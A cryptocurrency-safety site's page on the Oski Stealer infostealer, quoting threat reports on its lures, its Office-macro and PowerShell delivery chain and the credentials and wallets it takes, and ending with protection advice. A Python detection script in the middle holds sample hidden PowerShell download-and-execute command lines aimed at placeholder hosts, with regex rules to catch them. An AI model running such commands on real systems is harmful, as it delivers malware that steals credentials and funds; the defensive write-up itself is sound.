"First observed around November 2019, Oski Stealer is a popular threat, used to gather credentials and/or financial data from victims, and is readily available to purchase on various cybercriminal forums, typically advertised by a threat actor known as ‘oski_seller’, for around US$70-100 (Figure 1)." "As the name implies, the Oski stealer steals personal and sensitive information from its target. “Oski” is derived from an old Nordic word meaning Viking warrior, which is quite fitting considering this popular info-stealer is extremely effective at pillaging privileged information from its victims."


"Attackers try to trick users into installing Oski by hijacking router DNS settings in order that browsers then open corrupted pages and pop-ups. This motivates visitors to put in an application designed to deliver the latest information referring to the COVID-19. In fact, the file that’s downloaded through these malicious sites installs Oski, a trojan horse capable of stealing sensitive information." "[W]hen the settings are configured to use DNS servers operated by the attackers/cyber criminals. The servers redirect victims to an address displaying a web page encouraging them to download and install Oski, which is disguised as a legitimate app from the World Health Organization (WHO)."


"Given the nature of the email lure, recipients targeted will likely include those working within Business Administration, Finance and Sales teams. Furthermore, the compromise of one organization could lead to legitimate email accounts being abused to send convincing lures to other organizations, such as their customers, partners and suppliers." "Having lured the victim into opening the malicious email attachment, a weaponized Microsoft PowerPoint (PPT) file in this case, albeit easily interchangeable for some other Microsoft Office file, the victim is prompted to ‘Enable Editing’ and ‘Enable Content’ resulting in an embedded macro (Figure 4) being executed to download and initiate the first stage Powershell script. Whilst lightly obfuscated, this macro creates a Windows Scripting Host Shell Execution object, wshshell.exec, that executes the Microsoft HTML Application process, mshta, to send a HTTP GET request to a ‘Bit.ly’ shortened URL."


"Having redirected to a Blogspot-hosted page, the resulting HTML file (Figure 6) contains a Visual Basic script that is used to ultimately download and launch Agent Tesla that, in turn, downloads and launches Oski Stealer." "Using basic obfuscation, the Visual Basic Script downloader launches a hidden PowerShell window (-w 1), calling the Invoke-Expression (i'E'x) and Invoke-WebRequest (iwr) cmdlets to download and execute a PowerShell script named divine.txt from ‘Archive.org’. The hosting of content on this legitimate service is likely an attempt to avoid detection whilst allowing the delivery method to be updated mid-campaign without needing to manage infrastructure such as domains and/or VPS instances."
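The delivery chain quoted above (Office macro starting mshta with a URL, then a hidden PowerShell window running quote-split `i'E'x` with `iwr`) can be matched in process-creation telemetry. The following is an added example, not code from the quoted reports or from this page; the event tuples, rule names and URLs are constructed for illustration.

```python
import re

OFFICE = {"powerpnt.exe", "winword.exe", "excel.exe"}
SYS32 = "C:\\Windows\\System32\\"
# Constructed process-creation events: (parent image, image, command line).
# The URLs are placeholders, not indicators from the campaign.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Microsoft Office\\POWERPNT.EXE", SYS32 + "mshta.exe",
     "mshta https://short.example/abc123"),
    (SYS32 + "mshta.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -w 1 i'E'x(iwr('https://files.example/divine.txt') -UseBasicParsing)"),
    ("C:\\Windows\\explorer.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -File C:\\Scripts\\backup.ps1"),
    ("C:\\Windows\\explorer.exe", SYS32 + "mshta.exe", "mshta C:\\Apps\\help.hta"),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def normalize(cmd):
    """Drop quote, backtick and caret characters used to split keywords; lowercase."""
    return re.sub(r"['\"`^]", "", cmd).lower()

def hidden_window(norm):
    """True if any prefix of -WindowStyle is set to hidden (named, or 1 as in the report)."""
    m = re.search(r"\s-(w[a-z]*)\s+(1|hidden)\b", norm)
    return bool(m) and "windowstyle".startswith(m.group(1))

def detect(events):
    hits = []
    for i, (parent, image, cmd) in enumerate(events):
        norm = normalize(cmd)
        # Rule 1: an Office application starts mshta with a remote URL.
        if (basename(parent) in OFFICE and basename(image) == "mshta.exe"
                and re.search(r"https?://", norm)):
            hits.append((i, "office_spawns_mshta_url"))
        # Rule 2: hidden PowerShell that both downloads and evaluates the result.
        if (basename(image) in {"powershell.exe", "pwsh.exe"} and hidden_window(norm)
                and re.search(r"\b(iwr|invoke-webrequest)\b", norm)
                and re.search(r"\b(iex|invoke-expression)\b", norm)):
            hits.append((i, "hidden_ps_download_exec"))
    return hits

if __name__ == "__main__":
    for index, rule in detect(SAMPLE_EVENTS):
        print(index, rule, SAMPLE_EVENTS[index][2])
```

Normalizing before matching is what lets the rule see `iex` in `i'E'x`; the two benign events (a local `.hta` and a scheduled script) stay unflagged.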


"Cyberint Research observed a number of unsolicited malicious email (malspam) campaigns throughout July 2021 in which Agent Tesla has been used to deliver ‘Oski Stealer’ to a variety of targets worldwide." "In addition to being actively sold and supported by the original creator, unverified forum posts suggest that a ‘cracked’ version of Oski Stealer was leaked toward the end of 2020 (Figure 2) that, if true, could potentially lead to broader adoption."


"The stealer is written in C++ and has all the typical features of credential theft malware. Oski targets sensitive information including login credentials from different applications, browser information (cookies, autofill data and credit cards), crypto wallets, system information, screenshots, [and] different user files." "It also attempts to steal databases that contain 2FA (two-factor authentication) data, cryptocurrency wallets, and text files, and can take screenshots of the victim's desktop and perform other dubious actions. In this way, cyber criminals behind Oski are able to hijack various accounts, including social media, email, cryptocurrency trading accounts, and so on."


"After infecting a machine, the malware attempts retrieving sensitive information from web browsers based on Chromium and Firefox along with a special focus on Filezilla and crypto wallets like Bitcoin Core, Ethereum, ElectrumLTC, Monero, Electrum, Dash, Litecoin, ZCash." "Bitcoin Core, Ethereum, ElectrumLTC, Monero, Electrum, Exodus, Dash, Litecoin, ElectronCash, ZCash, MultiDoge, AnonCoin, BBQCoin, DevCoin, DigitalCoin, FlorinCoin, Franko, FreiCoin, GoldCoin, InfiniteCoin, IOCoin, IxCoin, MegaCoin, MinCoin, NameCoin, PrimeCoin, TerraCoin, YACoin. Files from machine data about machine."


"Upon the completion of the data theft stage, Oski Stealer creates a compressed Zip archive containing all of this stolen data, and names this with an underscore followed by the first ten digits of the working directory name."


"Beyond these, the stealer can function as a Downloader to download a second-stage malware." Attackers "might [also] be capable of hijacking accounts that have an additional layer of protection beyond passwords. Cyber criminals misuse stolen accounts to make fraudulent purchases and transactions, spread spam campaigns, trick other users into paying money to them, steal identities, etc."

Oski Stealer is malware that steals a user's private information, including crypto wallet details. It typically spreads through targeted phishing attacks that trick the recipient into downloading an infected Microsoft Office file (such as PowerPoint). Once the file is downloaded, it installs malware which obtains data and can also launch other "command and control" functions. While the software does target many cryptocurrency wallets, it's unclear how successful the attacks have been, as it tends to target unsophisticated business workers and not crypto users who would typically use such wallets.


The basic protection is to not download any attachments from untrusted sources, and especially do not enable macros in a downloaded Microsoft Office file. Be extra careful if the file is of an unexpected type (for example a PowerPoint file when it's a purchase order). In general, all downloads should only be done from a trusted source. The vast majority of cryptocurrency should be stored fully offline when not being actively used.



© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.